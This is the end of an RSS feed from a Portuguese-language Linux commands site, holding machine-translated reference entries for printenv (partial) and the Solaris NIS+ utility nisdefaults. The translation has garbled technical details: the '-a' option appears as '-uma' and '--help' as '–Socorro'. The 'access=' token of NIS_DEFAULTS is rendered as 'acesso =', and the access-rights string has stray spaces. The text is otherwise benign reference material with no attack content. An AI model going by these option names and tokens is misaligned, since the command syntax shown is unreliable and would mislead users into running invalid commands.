<p class="tab"><b>printenv</b> imprime os valores do ambiente<i></i> especificado <i>VARIABLE (s)</i> . Se nenhum <i>V</i><i></i><i>ARIABLE</i> for especificado, imprima os pares de nome e valor para todos eles.</p>
<p class="tab">NOTA: seu shell pode ter sua própria versão do <b>printenv</b> , que geralmente substitui a versão descrita aqui. Por favor, consulte a documentação do seu shell para detalhes sobre as opções que ele suporta.</p>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><b>-0</b> , <b>&#8211;null</b></td>
<td>Finalize cada linha de saída com <b>0</b> byte em vez de nova linha .</td>
</tr>
<tr class="tcw">
<td><b>&#8211;Socorro</b></td>
<td>Exiba uma mensagem de ajuda e saia.</td>
</tr>
</tbody>
</table>
<h2 id="examples">Exemplos</h2>
<pre class="tcy tab">printenv HOME</pre>
<p class="tab">Exibe a localização do diretório inicial do usuário atual .</p>
<pre class="tcy tab">printenv</pre>
<p class="tab">Exiba os valores de todas as variáveis ​​de ambiente.</p>
<h2 id="related">Comandos relacionados</h2>
<p class="tab"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-env/"><b>env</b></a> &#8211; Relate o valor das variáveis ​​de ambiente.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Comandos Linux &#8211; Comando nisdefaults</title>
		<link>https://linuxforce.com.br/sem-categoria/comandos-linux-comando-nisdefaults/</link>
		
		<dc:creator><![CDATA[Marcio Mariano]]></dc:creator>
		<pubDate>Wed, 23 Oct 2019 17:20:50 +0000</pubDate>
				<category><![CDATA[Sem categoria]]></category>
		<guid isPermaLink="false">https://www.linuxforce.com.br/?p=2254</guid>

					<description><![CDATA[Comando nisdefaults do Linux No sistema operacional Solaris , o comando nisdefaults exibe os valores padrão do NIS +. Descrição Sintaxe Exemplos Comandos relacionados Descrição O utilitário nisdefaults imprime os valores padrão retornados pelas chamadas para as funções de nome local do NIS +. Sem opções especificadas, todos os padrões serão impressos em um formato detalhado . Com as opções, somente essa opção é exibida em um formato conciso [&#8230;]]]></description>
										<content:encoded><![CDATA[<h1>Comando nisdefaults do Linux</h1>
<div class="updated"></div>
<p><img loading="lazy" decoding="async" class="floatRight" src="https://www.computerhope.com/cdn/linux/nisdefaults.gif" alt="comando nisdefaults" width="300" height="300" /></p>
<p class="intro">No sistema operacional Solaris , o comando <b>nisdefaults</b> exibe os valores padrão do NIS +.</p>
<div class="pagenav contents">
<ul>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Descrição</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Sintaxe</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Exemplos</span></a></li>
<li><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-sh/"><span class="notranslate">Comandos relacionados</span></a></li>
</ul>
</div>
<h2 id="desc">Descrição</h2>
<p class="tab">O utilitário <b>nisdefaults</b> imprime os valores padrão retornados pelas chamadas para as funções de nome local do NIS +. Sem opções especificadas, todos os padrões serão impressos em um formato detalhado . Com as opções, somente essa opção é exibida em um formato conciso adequado para scripts de shell . Veja o exemplo abaixo.</p>
<h2 id="syntax">Sintaxe</h2>
<pre class="tcy tab">nisdefaults [-adghprstv]</pre>
<h2>Opções</h2>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><b>-uma</b></td>
<td>Imprima todos os padrões em um formato conciso.</td>
</tr>
<tr class="tcw">
<td><b>-d</b></td>
<td>Imprima o nome de domínio padrão .</td>
</tr>
<tr class="tcw">
<td><b>-g</b></td>
<td>Imprima o nome do grupo padrão.</td>
</tr>
<tr class="tcw">
<td><b>-h</b></td>
<td>Imprima o nome do host padrão .</td>
</tr>
<tr class="tcw">
<td><b>-p</b></td>
<td>Imprima o nome principal padrão.</td>
</tr>
<tr class="tcw">
<td><b>-r</b></td>
<td>Imprima os direitos de acesso padrão com os quais novos objetos serão criados.</td>
</tr>
<tr class="tcw">
<td><b>-s</b></td>
<td>Imprima o caminho de pesquisa de diretório padrão .</td>
</tr>
<tr class="tcw">
<td><b>-t</b></td>
<td>Imprima o tempo padrão para viver o valor.</td>
</tr>
<tr class="tcw">
<td><b>-v</b></td>
<td>Imprima os padrões em um formato detalhado. Anexa uma sequência de identificação à saída.</td>
</tr>
</tbody>
</table>
<h2>Meio Ambiente</h2>
<p class="tab"><b>nisdefaults</b> utiliza as seguintes variáveis ​​de ambiente :</p>
<table class="mtable3 tab">
<tbody>
<tr class="tcw">
<td><b>NIS_DEFAULTS</b></td>
<td>Variável que contém uma sequência de padrões que substituirá os padrões padrão do NIS +. A sequência padrão é uma série de tokens separados por dois pontos. Esses tokens representam os valores padrão a serem usados ​​para as propriedades genéricas do objeto. Os tokens legais são:</p>
<table class="mtable3">
<tbody>
<tr class="tcw">
<td><b>ttl = </b><i>tempo</i></td>
<td>Token que define o tempo padrão de vida dos objetos criados. O valor time é especificado no formato definido pelo comando nischttl . O valor padrão é <b>12</b> horas.</td>
</tr>
<tr class="tcw">
<td><b>owner = </b><i>ownername</i></td>
<td>Token que especifica que o nome do proprietário principal do NIS + deve possuir objetos criados. O padrão para esse valor é o principal que está executando o comando.</td>
</tr>
<tr class="tcw">
<td><b>group = </b><i>groupname</i></td>
<td>Token que especifica que o nome do grupo do grupo deve ser o proprietário do grupo dos objetos criados. O padrão é NULL.</td>
</tr>
<tr class="tcw">
<td><b>acesso = </b><i>direitos</i></td>
<td>Token que especifica o conjunto de direitos de acesso que devem ser concedidos aos objetos criados. Os direitos do valor são especificados no formato conforme definido pelo comando nischmod . O valor padrão é:</p>
<pre>---- rmcdr --- r ---</pre>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr class="tcw">
<td><b>NIS_GROUP</b></td>
<td>Variável que contém o nome do grupo NIS + local. Se o nome não for totalmente qualificado, o domínio padrão será anexado a ele.</td>
</tr>
<tr class="tcw">
<td><b>NIS_PATH</b></td>
<td>Variável que substitui o caminho de pesquisa de diretório NIS + padrão. Ele contém uma lista ordenada de diretórios separados por caracteres &#8216; <b>:</b> &#8216; (dois pontos). O caractere &#8216; <b>$</b> &#8216; (cifrão) é tratado especialmente. Os nomes de diretório que terminam em &#8216; <b>$</b> &#8216; têm o domínio padrão anexado a eles, e um &#8216; <b>$</b> &#8216; por si só é substituído pela lista de diretórios entre o domínio padrão e a raiz global com pelo menos dois níveis de profundidade. O caminho de pesquisa do diretório NIS + padrão é &#8216; <b>$</b> &#8216;.</p>
<p>Consulte a subseção <i>Expansão de nome</i> no NIS + para obter mais detalhes.</td>
</tr>
</tbody>
</table>
<h2 id="examples">Exemplos</h2>
<pre class="tcy tab">nisdefaults</pre>
<p class="tab">Exibir valores NIS padrão. A saída será semelhante ao seguinte exemplo:</p>
<pre class="tab">Nome principal: example.computerhope.com.
Nome de domínio: computerhope.com.
Nome do host: example.computerhope.com.
Nome do grupo :
Direitos de Acesso: ---- rmcdr --- r ---
Tempo de vida: 12:00:00
Caminho de pesquisa: computerhope.com.</pre>
<h2 id="related">Comandos relacionados</h2>
<p class="tab"><a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-nichmod/"><b>nischmod</b></a> &#8211; Altera os direitos de acesso em um objeto NIS +.<br />
<a href="https://www.linuxforce.com.br/comandos-linux/comandos-linux-comando-nischttl/"><b>nischttl</b></a> &#8211; <b>altera</b> o tempo de vida do valor de um objeto NIS +.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
